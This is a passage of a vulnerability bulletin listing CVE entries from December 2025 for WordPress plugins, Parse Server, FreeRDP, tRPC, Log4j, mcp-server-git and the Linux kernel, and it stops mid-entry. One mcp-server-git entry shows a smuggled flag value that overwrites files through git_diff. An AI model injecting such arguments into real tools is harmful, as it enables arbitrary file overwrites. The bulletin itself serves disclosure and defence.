| SEMrush CY LTD--Semrush Content Toolkit | Cross-Site Request Forgery (CSRF) vulnerability in SEMrush CY LTD Semrush Content Toolkit semrush-contentshake allows Cross Site Request Forgery. This issue affects Semrush Content Toolkit: from n/a through <= 1.1.32. | 2025-12-16 | not yet calculated | CVE-2025-68082 | https://vdp.patchstack.com/database/Wordpress/Plugin/semrush-contentshake/vulnerability/wordpress-semrush-content-toolkit-plugin-1-1-32-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Meks--Meks Quick Plugin Disabler | Cross-Site Request Forgery (CSRF) vulnerability in Meks Meks Quick Plugin Disabler meks-quick-plugin-disabler allows Cross Site Request Forgery. This issue affects Meks Quick Plugin Disabler: from n/a through <= 1.0. | 2025-12-16 | not yet calculated | CVE-2025-68083 | https://vdp.patchstack.com/database/Wordpress/Plugin/meks-quick-plugin-disabler/vulnerability/wordpress-meks-quick-plugin-disabler-plugin-1-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Nitesh--Ultimate Auction | Missing Authorization vulnerability in Nitesh Ultimate Auction ultimate-auction allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Ultimate Auction: from n/a through <= 4.3.2. | 2025-12-16 | not yet calculated | CVE-2025-68084 | https://vdp.patchstack.com/database/Wordpress/Plugin/ultimate-auction/vulnerability/wordpress-ultimate-auction-plugin-4-3-2-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Buttoner for Elementor | Missing Authorization vulnerability in merkulove Buttoner for Elementor buttoner-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Buttoner for Elementor: from n/a through <= 1.0.6. | 2025-12-16 | not yet calculated | CVE-2025-68085 | https://vdp.patchstack.com/database/Wordpress/Plugin/buttoner-elementor/vulnerability/wordpress-buttoner-for-elementor-plugin-1-0-6-settings-change-vulnerability?_s_id=cve |
| merkulove--Reformer for Elementor | Missing Authorization vulnerability in merkulove Reformer for Elementor reformer-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Reformer for Elementor: from n/a through <= 1.0.6. | 2025-12-16 | not yet calculated | CVE-2025-68086 | https://vdp.patchstack.com/database/Wordpress/Plugin/reformer-elementor/vulnerability/wordpress-reformer-for-elementor-plugin-1-0-6-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Modalier for Elementor | Missing Authorization vulnerability in merkulove Modalier for Elementor modalier-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Modalier for Elementor: from n/a through <= 1.0.6. | 2025-12-16 | not yet calculated | CVE-2025-68087 | https://vdp.patchstack.com/database/Wordpress/Plugin/modalier-elementor/vulnerability/wordpress-modalier-for-elementor-plugin-1-0-6-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Huger for Elementor | Missing Authorization vulnerability in merkulove Huger for Elementor huger-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Huger for Elementor: from n/a through <= 1.1.5. | 2025-12-16 | not yet calculated | CVE-2025-68088 | https://vdp.patchstack.com/database/Wordpress/Plugin/huger-elementor/vulnerability/wordpress-huger-for-elementor-plugin-1-1-5-broken-access-control-vulnerability?_s_id=cve |
| parse-community--parse-server | Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. In versions prior to 8.6.1 and 9.1.0-alpha.3, a Reflected Cross-Site Scripting (XSS) vulnerability exists in Parse Server's password reset and email verification HTML pages. The patch, available in versions 8.6.1 and 9.1.0-alpha.3, escapes user controlled values that are inserted into the HTML pages. No known workarounds are available. | 2025-12-16 | not yet calculated | CVE-2025-68115 | https://github.com/parse-community/parse-server/security/advisories/GHSA-jhgf-2h8h-ggxv https://github.com/parse-community/parse-server/pull/9985 https://github.com/parse-community/parse-server/pull/9986 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to version 3.20.0, a vulnerability exists in FreeRDP's certificate handling code on Windows platforms. The function `freerdp_certificate_data_hash_` uses the Microsoft-specific `_snprintf` function to format certificate cache filenames without guaranteeing NUL termination when truncation occurs. According to Microsoft documentation, `_snprintf` does not append a terminating NUL byte if the formatted output exceeds the destination buffer size. If an attacker controls the hostname value (for example via server redirection or a crafted .rdp file), the resulting filename buffer may not be NUL-terminated. Subsequent string operations performed on this buffer may read beyond the allocated memory region, resulting in a heap-based out-of-bounds read. In default configurations, the connection is typically terminated before sensitive data can be meaningfully exposed, but an unintended memory read or a client crash may still occur under certain conditions. Version 3.20.0 has a patch for the issue. | 2025-12-17 | not yet calculated | CVE-2025-68118 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-h78c-5cjx-jw6x https://github.com/FreeRDP/FreeRDP/commit/a0b21f992a9de1de2468fc9e600aa2b7a4066307 |
| trpc--trpc | tRPC allows users to build and consume fully typesafe APIs without schemas or code generation. Starting in version 10.27.0 and prior to versions 10.45.3 and 11.8.0, a prototype pollution vulnerability exists in `@trpc/server`'s `formDataToObject` function, which is used by the Next.js App Router adapter. An attacker can pollute `Object.prototype` by submitting specially crafted FormData field names, potentially leading to authorization bypass, denial of service, or other security impacts. Note that this vulnerability is only present when using `experimental_caller` / `experimental_nextAppDirCaller`. Versions 10.45.3 and 11.8.0 fix the issue. | 2025-12-16 | not yet calculated | CVE-2025-68130 | https://github.com/trpc/trpc/security/advisories/GHSA-43p4-m455-4f4j |
| facelessuser--pymdown-extensions | PyMdown Extensions is a set of extensions for the `Python-Markdown` markdown project. Versions prior to 10.16.1 have a ReDoS bug found within the figure caption extension (`pymdownx.blocks.caption`). In systems that take unchecked user content, this could cause long hangs when processing the data if a malicious payload was crafted. This issue is patched in Release 10.16.1. As a workaround, those who process unknown user content without timeouts or other safeguards in place to prevent really large, malicious content being aimed at systems may avoid the use of `pymdownx.blocks.caption` until they're able to upgrade. | 2025-12-16 | not yet calculated | CVE-2025-68142 | https://github.com/facelessuser/pymdown-extensions/security/advisories/GHSA-r6h4-mm7h-8pmq https://github.com/facelessuser/pymdown-extensions/commit/b50d15a56850ed1408a284bba81cc019c6bd72e8 https://pypi.org/project/pymdown-extensions/10.16.1 |
| modelcontextprotocol--servers | Model Context Protocol Servers is a collection of reference implementations for the model context protocol (MCP). In mcp-server-git versions prior to 2025.9.25, the git_init tool accepted arbitrary filesystem paths and created Git repositories without validating the target location. Unlike other tools which required an existing repository, git_init could operate on any directory accessible to the server process, making those directories eligible for subsequent git operations. The tool was removed entirely, as the server is intended to operate on existing repositories only. Users are advised to upgrade to 2025.9.25 or newer to remediate this issue. | 2025-12-17 | not yet calculated | CVE-2025-68143 | https://github.com/modelcontextprotocol/servers/security/advisories/GHSA-5cgr-j3jf-jw3v https://github.com/modelcontextprotocol/servers/commit/eac56e7bcde48fb64d5a973924d05d69a7d876e6 |
| modelcontextprotocol--servers | In mcp-server-git versions prior to 2025.12.17, the git_diff and git_checkout functions passed user-controlled arguments directly to git CLI commands without sanitization. Flag-like values (e.g., `--output=/path/to/file` for `git_diff`) would be interpreted as command-line options rather than git refs, enabling arbitrary file overwrites. The fix adds validation that rejects arguments starting with `-` and verifies the argument resolves to a valid git ref via rev_parse before execution. Users are advised to update to 2025.12.17 to resolve this issue when it is released. | 2025-12-17 | not yet calculated | CVE-2025-68144 | https://github.com/modelcontextprotocol/servers/security/advisories/GHSA-9xwc-hfwc-8w59 |
| modelcontextprotocol--servers | In mcp-server-git versions prior to 2025.12.17, when the server is started with the --repository flag to restrict operations to a specific repository path, it did not validate that repo_path arguments in subsequent tool calls were actually within that configured path. This could allow tool calls to operate on other repositories accessible to the server process. The fix adds path validation that resolves both the configured repository and the requested path (following symlinks) and verifies the requested path is within the allowed repository before executing any git operations. Users are advised to upgrade to 2025.12.17 upon release to remediate this issue. | 2025-12-17 | not yet calculated | CVE-2025-68145 | https://github.com/modelcontextprotocol/servers/security/advisories/GHSA-j22h-9j4x-23w5 |
| parse-community--parse-server | Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 8.6.2 and 9.1.1-alpha.1, the Instagram authentication adapter allows clients to specify a custom API URL via the `apiURL` parameter in `authData`. This enables SSRF attacks and possibly authentication bypass if malicious endpoints return fake responses to validate unauthorized users. This is fixed in versions 8.6.2 and 9.1.1-alpha.1 by hardcoding the Instagram Graph API URL `https://graph.instagram.com` and ignoring client-provided `apiURL` values. No known workarounds are available. | 2025-12-16 | not yet calculated | CVE-2025-68150 | https://github.com/parse-community/parse-server/security/advisories/GHSA-3f5f-xgrj-97pf https://github.com/parse-community/parse-server/pull/9988 https://github.com/parse-community/parse-server/pull/9989 |
| Apache Software Foundation--Apache Log4j Core | The Socket Appender in Apache Log4j Core versions 2.0-beta9 through 2.25.2 does not perform TLS hostname verification of the peer certificate, even when the verifyHostName https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName configuration attribute or the log4j2.sslVerifyHostName https://logging.apache.org/log4j/2.x/manual/systemproperties.html#log4j2.sslVerifyHostName system property is set to true. This issue may allow a man-in-the-middle attacker to intercept or redirect log traffic under the following conditions: * The attacker is able to intercept or redirect network traffic between the client and the log receiver. * The attacker can present a server certificate issued by a certification authority trusted by the Socket Appender's configured trust store (or by the default Java trust store if no custom trust store is configured). Users are advised to upgrade to Apache Log4j Core version 2.25.3, which addresses this issue. As an alternative mitigation, the Socket Appender may be configured to use a private or restricted trust root to limit the set of trusted certificates. | 2025-12-18 | not yet calculated | CVE-2025-68161 | https://github.com/apache/logging-log4j2/pull/4002 https://logging.apache.org/security.html#CVE-2025-68161 https://logging.apache.org/cyclonedx/vdr.xml https://logging.apache.org/log4j/2.x/manual/systemproperties.html#log4j2.sslVerifyHostName https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName https://lists.apache.org/thread/xr33kyxq3sl67lwb61ggvm1fzc8k7dvx |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gpiolib: fix invalid pointer access in debugfs If the memory allocation in gpiolib_seq_start() fails, the s->private field remains uninitialized and is later dereferenced without checking in gpiolib_seq_stop(). Initialize s->private to NULL before calling kzalloc() and check it before dereferencing it. | 2025-12-16 | not yet calculated | CVE-2025-68167 | https://git.kernel.org/stable/c/70180a6031056096c93ed2f47c41803268bdd91c https://git.kernel.org/stable/c/3c91c8f424d3e44c8645ab765a38773e58afb07d https://git.kernel.org/stable/c/2f6115ad8864cf3f48598f26c74c7c8e5c391919 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: jfs: fix uninitialized waitqueue in transaction manager The transaction manager initialization in txInit() was not properly initializing TxBlock[0].waitor waitqueue, causing a crash when txEnd(0) is called on read-only filesystems. When a filesystem is mounted read-only, txBegin() returns tid=0 to indicate no transaction. However, txEnd(0) still gets called and tries to access TxBlock[0].waitor via tid_to_tblock(0), but this waitqueue was never initialized because the initialization loop started at index 1 instead of 0. This causes a 'non-static key' lockdep warning and system crash: INFO: trying to register non-static key in txEnd Fix by ensuring all transaction blocks including TxBlock[0] have their waitqueues properly initialized during txInit(). | 2025-12-16 | not yet calculated | CVE-2025-68168 | https://git.kernel.org/stable/c/d6af7fce2e162ac68e85d3a11eb6ac8c35b24b64 https://git.kernel.org/stable/c/8cae9cf23e0bd424ac904e753639a587543ce03a https://git.kernel.org/stable/c/a2aa97cde9857f881920635a2e3d3b11769619c5 https://git.kernel.org/stable/c/d2dd7ca05a11685c314e62802a55e8d67a90e974 https://git.kernel.org/stable/c/2a9575a372182ca075070b3cd77490dcf0c951e7 https://git.kernel.org/stable/c/cbf2f527ae4ca7c7dabce42e85e8deb58588a37e https://git.kernel.org/stable/c/038861414ab383b41dd35abbf9ff0ef715592d53 https://git.kernel.org/stable/c/300b072df72694ea330c4c673c035253e07827b8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netpoll: Fix deadlock in memory allocation under spinlock Fix an AA deadlock in refill_skbs() where memory allocation while holding skb_pool->lock can trigger a recursive lock acquisition attempt. The deadlock scenario occurs when the system is under severe memory pressure: 1. refill_skbs() acquires skb_pool->lock (spinlock) 2. alloc_skb() is called while holding the lock 3. Memory allocator fails and calls slab_out_of_memory() 4. This triggers printk() for the OOM warning 5. The console output path calls netpoll_send_udp() 6. netpoll_send_udp() attempts to acquire the same skb_pool->lock 7. Deadlock: the lock is already held by the same CPU Call stack: refill_skbs() spin_lock_irqsave(&skb_pool->lock) <- lock acquired __alloc_skb() kmem_cache_alloc_node_noprof() slab_out_of_memory() printk() console_flush_all() netpoll_send_udp() skb_dequeue() spin_lock_irqsave(&skb_pool->lock) <- deadlock attempt This bug was exposed by commit 248f6571fd4c51 ("netpoll: Optimize skb refilling on critical path") which removed refill_skbs() from the critical path (where nested printk was being deferred), letting nested printk be called from inside refill_skbs(). Refactor refill_skbs() to never allocate memory while holding the spinlock. Another possible solution to fix this problem is protecting the refill_skbs() from nested printks, basically calling printk_deferred_{enter,exit}() in refill_skbs(), then, any nested pr_warn() would be deferred. I prefer this approach, given I _think_ it might be a good idea to move the alloc_skb() from GFP_ATOMIC to GFP_KERNEL in the future, so, having the alloc_skb() outside of the lock will be a necessary step. There is a possible TOCTOU issue when checking for the pool length, and queueing the new allocated skb, but, this is not an issue, given that an extra SKB in the pool is harmless and it will be eventually used. | 2025-12-16 | not yet calculated | CVE-2025-68169 | https://git.kernel.org/stable/c/06742a3ab884d7428c9050b205ffcf6a8a548397 https://git.kernel.org/stable/c/327c20c21d80e0d87834b392d83ae73c955ad8ff |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/radeon: Do not kfree() devres managed rdev Since the allocation of the drivers main structure was changed to devm_drm_dev_alloc() rdev is managed by devres and we shouldn't be calling kfree() on it. This fixes things exploding if the driver probe fails and devres cleans up the rdev after we already free'd it. (cherry picked from commit 16c0681617b8a045773d4d87b6140002fa75b03b) | 2025-12-16 | not yet calculated | CVE-2025-68170 | https://git.kernel.org/stable/c/f7482516002a11317912e29577bbf33cf59a0fb1 https://git.kernel.org/stable/c/2413bbd1d692aed245c2aa38a369a1fa7590db84 https://git.kernel.org/stable/c/3328443363a0895fd9c096edfe8ecd372ca9145e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/fpu: Ensure XFD state on signal delivery Sean reported [1] the following splat when running KVM tests: WARNING: CPU: 232 PID: 15391 at xfd_validate_state+0x65/0x70 Call Trace: <TASK> fpu__clear_user_states+0x9c/0x100 arch_do_signal_or_restart+0x142/0x210 exit_to_user_mode_loop+0x55/0x100 do_syscall_64+0x205/0x2c0 entry_SYSCALL_64_after_hwframe+0x4b/0x53 Chao further identified [2] a reproducible scenario involving signal delivery: a non-AMX task is preempted by an AMX-enabled task which modifies the XFD MSR. When the non-AMX task resumes and reloads XSTATE with init values, a warning is triggered due to a mismatch between fpstate::xfd and the CPU's current XFD state. fpu__clear_user_states() does not currently re-synchronize the XFD state after such preemption. Invoke xfd_update_state() which detects and corrects the mismatch if there is a dynamic feature. This also benefits the sigreturn path, as fpu__restore_sig() may call fpu__clear_user_states() when the sigframe is inaccessible. [ dhansen: minor changelog munging ] | 2025-12-16 | not yet calculated | CVE-2025-68171 | https://git.kernel.org/stable/c/eefbfb722042fc9210d2e0ac2b063fd1abf51895 https://git.kernel.org/stable/c/1811c610653c0cd21cc9add14595b7cffaeca511 https://git.kernel.org/stable/c/5b2619b488f1d08b960c43c6468dd0759e8b3035 https://git.kernel.org/stable/c/3f735419c4b43cde42e6d408db39137b82474e31 https://git.kernel.org/stable/c/388eff894d6bc5f921e9bfff0e4b0ab2684a96e9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: aspeed - fix double free caused by devm The clock obtained via devm_clk_get_enabled() is automatically managed by devres and will be disabled and freed on driver detach. Manually calling clk_disable_unprepare() in error path and remove function causes double free. Remove the manual clock cleanup in both aspeed_acry_probe()'s error path and aspeed_acry_remove(). | 2025-12-16 | not yet calculated | CVE-2025-68172 | https://git.kernel.org/stable/c/0dd6474ced33489076e6c0f3fe5077bf12e85b28 https://git.kernel.org/stable/c/29d0504077044a7e1ffbd09a6118018d5954a6e5 https://git.kernel.org/stable/c/e8407dfd267018f4647ffb061a9bd4a6d7ebacc6 https://git.kernel.org/stable/c/3c9bf72cc1ced1297b235f9422d62b613a3fdae9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ftrace: Fix softlockup in ftrace_module_enable A soft lockup was observed when loading the amdgpu module. If a module has a lot of traceable functions, multiple calls to kallsyms_lookup can spend too much time in an RCU critical section and with disabled preemption, causing a kernel panic. This is the same issue that was fixed in commit d0b24b4e91fc ("ftrace: Prevent RCU stall on PREEMPT_VOLUNTARY kernels") and commit 42ea22e754ba ("ftrace: Add cond_resched() to ftrace_graph_set_hash()"). Fix it the same way by adding cond_resched() in ftrace_module_enable. | 2025-12-16 | not yet calculated | CVE-2025-68173 | https://git.kernel.org/stable/c/a1dd0abd741a8111260676da729825d6c1461a71 https://git.kernel.org/stable/c/e81e6d6d99b16dae11adbeda5c996317942a940c https://git.kernel.org/stable/c/40c8ee40e48a2c82c762539952ed8fc0571db5bf https://git.kernel.org/stable/c/7e3c96010ade29bb340a5bdce8675f50c7f59001 https://git.kernel.org/stable/c/4099b98203d6b33d990586542fa5beee408032a3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: amd/amdkfd: enhance kfd process check in switch partition The current switch partition only checks if kfd_processes_table is empty. The kfd_processes_table entry is deleted in kfd_process_notifier_release, but kfd_process tear down is in kfd_process_wq_release. Consider two processes: Process A (workqueue) -> kfd_process_wq_release -> Access kfd_node member Process B switch partition -> amdgpu_xcp_pre_partition_switch -> amdgpu_amdkfd_device_fini_sw -> kfd_node tear down. Process A and B may trigger a race as shown in the dmesg log. This patch resolves the race by adding an atomic kfd_process counter kfd_processes_count; it increments as a kfd process is created and decrements as kfd_process_wq_release finishes. v2: Put kfd_processes_count per kfd_dev, move decrement to kfd_process_destroy_pdds and bug fix. (Philip Yang) [3966658.307702] divide error: 0000 [#1] SMP NOPTI [3966658.350818] i10nm_edac [3966658.356318] CPU: 124 PID: 38435 Comm: kworker/124:0 Kdump: loaded Tainted [3966658.356890] Workqueue: kfd_process_wq kfd_process_wq_release [amdgpu] [3966658.362839] nfit [3966658.366457] RIP: 0010:kfd_get_num_sdma_engines+0x17/0x40 [amdgpu] [3966658.366460] Code: 00 00 e9 ac 81 02 00 66 66 2e 0f 1f 84 00 00 00 00 00 90 0f 1f 44 00 00 48 8b 4f 08 48 8b b7 00 01 00 00 8b 81 58 26 03 00 99 <f7> be b8 01 00 00 80 b9 70 2e 00 00 00 74 0b 83 f8 02 ba 02 00 00 [3966658.380967] x86_pkg_temp_thermal [3966658.391529] RSP: 0018:ffffc900a0edfdd8 EFLAGS: 00010246 [3966658.391531] RAX: 0000000000000008 RBX: ffff8974e593b800 RCX: ffff888645900000 [3966658.391531] RDX: 0000000000000000 RSI: ffff888129154400 RDI: ffff888129151c00 [3966658.391532] RBP: ffff8883ad79d400 R08: 0000000000000000 R09: ffff8890d2750af4 [3966658.391532] R10: 0000000000000018 R11: 0000000000000018 R12: 0000000000000000 [3966658.391533] R13: ffff8883ad79d400 R14: ffffe87ff662ba00 R15: ffff8974e593b800 [3966658.391533] FS: 0000000000000000(0000) GS:ffff88fe7f600000(0000) knlGS:0000000000000000 [3966658.391534] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [3966658.391534] CR2: 0000000000d71000 CR3: 000000dd0e970004 CR4: 0000000002770ee0 [3966658.391535] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [3966658.391535] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400 [3966658.391536] PKRU: 55555554 [3966658.391536] Call Trace: [3966658.391674] deallocate_sdma_queue+0x38/0xa0 [amdgpu] [3966658.391762] process_termination_cpsch+0x1ed/0x480 [amdgpu] [3966658.399754] intel_powerclamp [3966658.402831] kfd_process_dequeue_from_all_devices+0x5b/0xc0 [amdgpu] [3966658.402908] kfd_process_wq_release+0x1a/0x1a0 [amdgpu] [3966658.410516] coretemp [3966658.434016] process_one_work+0x1ad/0x380 [3966658.434021] worker_thread+0x49/0x310 [3966658.438963] kvm_intel [3966658.446041] ? process_one_work+0x380/0x380 [3966658.446045] kthread+0x118/0x140 [3966658.446047] ? __kthread_bind_mask+0x60/0x60 [3966658.446050] ret_from_fork+0x1f/0x30 [3966658.446053] Modules linked in: kpatch_20765354(OEK) [3966658.455310] kvm [3966658.464534] mptcp_diag xsk_diag raw_diag unix_diag af_packet_diag netlink_diag udp_diag act_pedit act_mirred act_vlan cls_flower kpatch_21951273(OEK) kpatch_18424469(OEK) kpatch_19749756(OEK) [3966658.473462] idxd_mdev [3966658.482306] kpatch_17971294(OEK) sch_ingress xt_conntrack amdgpu(OE) amdxcp(OE) amddrm_buddy(OE) amd_sched(OE) amdttm(OE) amdkcl(OE) intel_ifs iptable_mangle tcm_loop target_core_pscsi tcp_diag target_core_file inet_diag target_core_iblock target_core_user target_core_mod coldpgs kpatch_18383292(OEK) ip6table_nat ip6table_filter ip6_tables ip_set_hash_ipportip ip_set_hash_ipportnet ip_set_hash_ipport ip_set_bitmap_port xt_comment iptable_nat nf_nat iptable_filter ip_tables ip_set ip_vs_sh ip_vs_wrr ip_vs_rr ip_vs nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 sn_core_odd(OE) i40e overlay binfmt_misc tun bonding(OE) aisqos(OE) aisqo ---truncated--- | 2025-12-16 | not yet calculated | CVE-2025-68174 | https://git.kernel.org/stable/c/536d80f660ec12058e461f4db387ea42bee9250d https://git.kernel.org/stable/c/45da20e00d5da842e17dfc633072b127504f0d0e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: nxp: imx8-isi: Fix streaming cleanup on release The current implementation unconditionally calls mxc_isi_video_cleanup_streaming() in mxc_isi_video_release(). This can lead to situations where any release call (like from a simple "v4l2-ctl -l") may release a currently streaming queue when called on such a device. This is reproducible on an i.MX8MP board by streaming from an ISI capture device using gstreamer: gst-launch-1.0 -v v4l2src device=/dev/videoX ! \ video/x-raw,format=GRAY8,width=1280,height=800,framerate=1/120 ! \ fakesink While this stream is running, querying the caps of the same device provokes the error state: v4l2-ctl -l -d /dev/videoX This results in the following trace: [ 155.452152] ------------[ cut here ]------------ [ 155.452163] WARNING: CPU: 0 PID: 1708 at drivers/media/platform/nxp/imx8-isi/imx8-isi-pipe.c:713 mxc_isi_pipe_irq_handler+0x19c/0x1b0 [imx8_isi] [ 157.004248] Modules linked in: cfg80211 rpmsg_ctrl rpmsg_char rpmsg_tty virtio_rpmsg_bus rpmsg_ns rpmsg_core rfkill nft_ct nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 nf_tables mcp251x6 [ 157.053499] CPU: 0 UID: 0 PID: 1708 Comm: python3 Not tainted 6.15.4-00114-g1f61ca5cad76 #1 PREEMPT [ 157.064369] Hardware name: imx8mp_board_01 (DT) [ 157.068205] pstate: 400000c5 (nZcv daIF -PAN -UAO -TCO -DIT -SSBS BTYPE=--) [ 157.075169] pc : mxc_isi_pipe_irq_handler+0x19c/0x1b0 [imx8_isi] [ 157.081195] lr : mxc_isi_pipe_irq_handler+0x38/0x1b0 [imx8_isi] [ 157.087126] sp : ffff800080003ee0 [ 157.090438] x29: ffff800080003ee0 x28: ffff0000c3688000 x27: 0000000000000000 [ 157.097580] x26: 0000000000000000 x25: ffff0000c1e7ac00 x24: ffff800081b5ad50 [ 157.104723] x23: 00000000000000d1 x22: 0000000000000000 x21: ffff0000c25e4000 [ 157.111866] x20: 0000000060000200 x19: ffff80007a0608d0 x18: 0000000000000000 [ 157.119008] x17: ffff80006a4e3000 x16: ffff800080000000 x15: 0000000000000000 [ 157.126146] x14: 0000000000000000 x13: 0000000000000000 x12: 0000000000000000 [ 157.133287] x11: 0000000000000040 x10: ffff0000c01445f0 x9 : ffff80007a053a38 [ 157.140425] x8 : ffff0000c04004b8 x7 : 0000000000000000 x6 : 0000000000000000 [ 157.147567] x5 : ffff0000c0400490 x4 : ffff80006a4e3000 x3 : ffff0000c25e4000 [ 157.154706] x2 : 0000000000000000 x1 : ffff8000825c0014 x0 : 0000000060000200 [ 157.161850] Call trace: [ 157.164296] mxc_isi_pipe_irq_handler+0x19c/0x1b0 [imx8_isi] (P) [ 157.170319] __handle_irq_event_percpu+0x58/0x218 [ 157.175029] handle_irq_event+0x54/0xb8 [ 157.178867] handle_fasteoi_irq+0xac/0x248 [ 157.182968] handle_irq_desc+0x48/0x68 [ 157.186723] generic_handle_domain_irq+0x24/0x38 [ 157.191346] gic_handle_irq+0x54/0x120 [ 157.195098] call_on_irq_stack+0x24/0x30 [ 157.199027] do_interrupt_handler+0x88/0x98 [ 157.203212] el0_interrupt+0x44/0xc0 [ 157.206792] __el0_irq_handler_common+0x18/0x28 [ 157.211328] el0t_64_irq_handler+0x10/0x20 [ 157.215429] el0t_64_irq+0x198/0x1a0 [ 157.219009] ---[ end trace 0000000000000000 ]--- Address this issue by moving the streaming preparation and cleanup to the vb2 .prepare_streaming() and .unprepare_streaming() operations. This also simplifies the driver by allowing direct usage of the vb2_ioctl_streamon() and vb2_ioctl_streamoff() helpers, and removal of the manual cleanup from mxc_isi_video_release(). | 2025-12-16 | not yet calculated | CVE-2025-68175 | https://git.kernel.org/stable/c/029914306b93b37c6e7060793d2b6f76b935cfa6 https://git.kernel.org/stable/c/47773031a148ad7973b809cc7723cba77eda2b42 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI: cadence: Check for the existence of cdns_pcie::ops before using it cdns_pcie::ops might not be populated by all the Cadence glue drivers. This is going to be true for the upcoming Sophgo platform which doesn't set the ops. Hence, add a check to prevent NULL pointer dereference. [mani: reworded subject and description] | 2025-12-16 | not yet calculated | CVE-2025-68176 | https://git.kernel.org/stable/c/d5dbe92ac8a4ca6226093241f95f9cb1b0d2e0e1 https://git.kernel.org/stable/c/eb3d29ca0820fa3d7cccad47d2da56c9ab5469ed https://git.kernel.org/stable/c/0d0bb756f002810d249caee51f3f1c309f3cdab5 https://git.kernel.org/stable/c/1810b2fd7375de88a74976dcd402b29088e479ed https://git.kernel.org/stable/c/953eb3796ef06b8ea3bf6bdde14156255bc75866 https://git.kernel.org/stable/c/363448d069e29685ca37a118065121e486387af3 https://git.kernel.org/stable/c/49a6c160ad4812476f8ae1a8f4ed6d15adfa6c09 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cpufreq/longhaul: handle NULL policy in longhaul_exit longhaul_exit() was calling cpufreq_cpu_get(0) without checking for a NULL policy pointer. On some systems, this could lead to a NULL dereference and a kernel warning or panic. This patch adds a check using unlikely() and returns early if the policy is NULL. Bugzilla: #219962 | 2025-12-16 | not yet calculated | CVE-2025-68177 | https://git.kernel.org/stable/c/b02352dd2e6cca98777714cc2a27553191df70db https://git.kernel.org/stable/c/956b56d17a89775e4957bbddefa45cd3c6c71000 https://git.kernel.org/stable/c/55cf586b9556863e3c2a45460aba71bcb2be5bcd https://git.kernel.org/stable/c/fd93e1d71b3b14443092919be12b1abf08de35eb https://git.kernel.org/stable/c/8d6791c480f22d6e9a566eaa77336d3d37c5c591 https://git.kernel.org/stable/c/64adabb6d9d51b7e7c02fe733346a2c4dd738488 https://git.kernel.org/stable/c/809cf2a7794ca4c14c304b349f4c3ae220701ce4 https://git.kernel.org/stable/c/592532a77b736b5153e0c2e4c74aa50af0a352ab |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: blk-cgroup: fix possible deadlock while configuring policy The following deadlock can be triggered easily by lockdep: WARNING: possible circular locking dependency detected 6.17.0-rc3-00124-ga12c2658ced0 #1665 Not tainted ------------------------------------------------------ check/1334 is trying to acquire lock: ff1100011d9d0678 (&q->sysfs_lock){+.+.}-{4:4}, at: blk_unregister_queue+0x53/0x180 but task is already holding lock: ff1100011d9d00e0 (&q->q_usage_counter(queue)#3){++++}-{0:0}, at: del_gendisk+0xba/0x110 which lock already depends on the new lock. the existing dependency chain (in reverse order) is: -> #2 (&q->q_usage_counter(queue)#3){++++}-{0:0}: blk_queue_enter+0x40b/0x470 blkg_conf_prep+0x7b/0x3c0 tg_set_limit+0x10a/0x3e0 cgroup_file_write+0xc6/0x420 kernfs_fop_write_iter+0x189/0x280 vfs_write+0x256/0x490 ksys_write+0x83/0x190 __x64_sys_write+0x21/0x30 x64_sys_call+0x4608/0x4630 do_syscall_64+0xdb/0x6b0 entry_SYSCALL_64_after_hwframe+0x76/0x7e -> #1 (&q->rq_qos_mutex){+.+.}-{4:4}: __mutex_lock+0xd8/0xf50 mutex_lock_nested+0x2b/0x40 wbt_init+0x17e/0x280 wbt_enable_default+0xe9/0x140 blk_register_queue+0x1da/0x2e0 __add_disk+0x38c/0x5d0 add_disk_fwnode+0x89/0x250 device_add_disk+0x18/0x30 virtblk_probe+0x13a3/0x1800 virtio_dev_probe+0x389/0x610 really_probe+0x136/0x620 __driver_probe_device+0xb3/0x230 driver_probe_device+0x2f/0xe0 __driver_attach+0x158/0x250 bus_for_each_dev+0xa9/0x130 driver_attach+0x26/0x40 bus_add_driver+0x178/0x3d0 driver_register+0x7d/0x1c0 __register_virtio_driver+0x2c/0x60 virtio_blk_init+0x6f/0xe0 do_one_initcall+0x94/0x540 kernel_init_freeable+0x56a/0x7b0 kernel_init+0x2b/0x270 ret_from_fork+0x268/0x4c0 ret_from_fork_asm+0x1a/0x30 -> #0 (&q->sysfs_lock){+.+.}-{4:4}: __lock_acquire+0x1835/0x2940 lock_acquire+0xf9/0x450 __mutex_lock+0xd8/0xf50 mutex_lock_nested+0x2b/0x40 blk_unregister_queue+0x53/0x180 __del_gendisk+0x226/0x690 del_gendisk+0xba/0x110 sd_remove+0x49/0xb0 